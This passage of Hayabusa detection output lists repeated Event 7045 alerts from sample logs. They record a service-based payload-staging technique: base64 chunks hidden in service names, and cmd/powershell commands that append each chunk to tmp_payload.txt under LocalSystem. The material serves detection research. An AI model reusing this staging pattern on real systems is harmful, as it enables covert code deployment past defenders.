ICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:14.610 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:16.058 
+09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCg0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:16.058 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCg0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:16.058 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCg0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:17:17.508 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gQ3JlYXRlIGEgbG9nIHJlcG9ydCBmb3IgdGhlIGVhY2ggY29tcHV0ZXIgaW4gdGhlIGNvbXB1dGVyIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:17.508 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gQ3JlYXRlIGEgbG9nIHJlcG9ydCBmb3IgdGhlIGVhY2ggY29tcHV0ZXIgaW4gdGhlIGNvbXB1dGVyIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:17.508 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gQ3JlYXRlIGEgbG9nIHJlcG9ydCBmb3IgdGhlIGVhY2ggY29tcHV0ZXIgaW4gdGhlIGNvbXB1dGVyIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:18.961 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:18.961 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:18.961 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:20.414 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:20.414 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:20.414 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:21.867 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:21.867 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:21.867 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:23.325 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:23.325 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:23.325 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:24.762 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:24.762 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:17:24.762 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:26.229 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:26.229 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:26.229 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:27.683 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:27.683 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:27.683 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:29.154 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:29.154 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:29.154 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:30.607 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:30.607 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:30.607 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:32.038 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:32.038 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
